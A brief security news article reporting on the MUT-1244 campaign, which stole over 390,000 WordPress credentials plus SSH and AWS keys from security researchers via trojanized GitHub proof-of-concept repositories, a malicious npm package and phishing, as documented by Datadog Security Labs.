Overview A sophisticated cyber campaign has resulted in the theft of over 390,000 WordPress credentials. A group known as MUT-1244 orchestrated this extensive year-long operation, targeting both malicious actors and cybersecurity professionals through a compromised WordPress credential utility.

Research Discovery

Datadog Security Labs identified the attack, noting that additional sensitive data—including SSH private keys and AWS access credentials—were compromised across numerous victims.

Victims

This breach has affected red teamers, penetration testers, security researchers, and other threat actors.

Trojanized Repositories

The attackers deployed a second-stage payload via multiple GitHub repositories containing malicious proof-of-concept (PoC) exploits. These exploits targeted known vulnerabilities.

Phishing Tactics

Victims received fraudulent emails instructing them to install what appeared to be a legitimate CPU microcode update, which was actually a disguised kernel upgrade with malware.

Payload Delivery

Methods included backdoored configuration files, malicious PDFs, Python droppers, and compromised npm packages.

Broader Implications The attackers exploited trusted channels within the cybersecurity community to effectively mask their operations. Fake PoC exploits significantly enhanced the perceived legitimacy of the repositories, increasing the likelihood of their use. This effectively facilitated further dissemination of the malicious payload, compromising cybersecurity practitioners and threat actors alike.

Previous Campaign Links

The campaign aligns with an earlier attack detailed in a Checkmarkx report from November. The same GitHub project, "hpc20235/yawp," was used, involving the "0xengine/xmlrpc" npm package for data theft and cryptocurrency mining.

Malware Functionality

The malware involved included a cryptocurrency miner and backdoor capabilities to harvest and exfiltrate private SSH keys, AWS credentials, and other sensitive environmental data.

Exfiltration Techniques

Stolen data was transferred to platforms such as Dropbox and file.io using hardcoded credentials included in the payload, providing easy access for the attackers.

Current Status and Ongoing Threat MUT-1244 managed to validate stolen WordPress credentials through the compromised "yawpp" tool, a so-called "credentials checker," gaining the trust of cyber actors seeking to verify illicitly obtained data. Trust within the cybersecurity domain was leveraged to infiltrate systems belonging to both legitimate and illegitimate users, leading to an expansive data breach inclusive of SSH and AWS tokens. Datadog Security Labs warns that hundreds of systems are likely still compromised, with ongoing infections happening as the campaign persists. Such vulnerabilities underscore the necessity for vigilance and proactive measures within the cybersecurity community.

The link has been copied!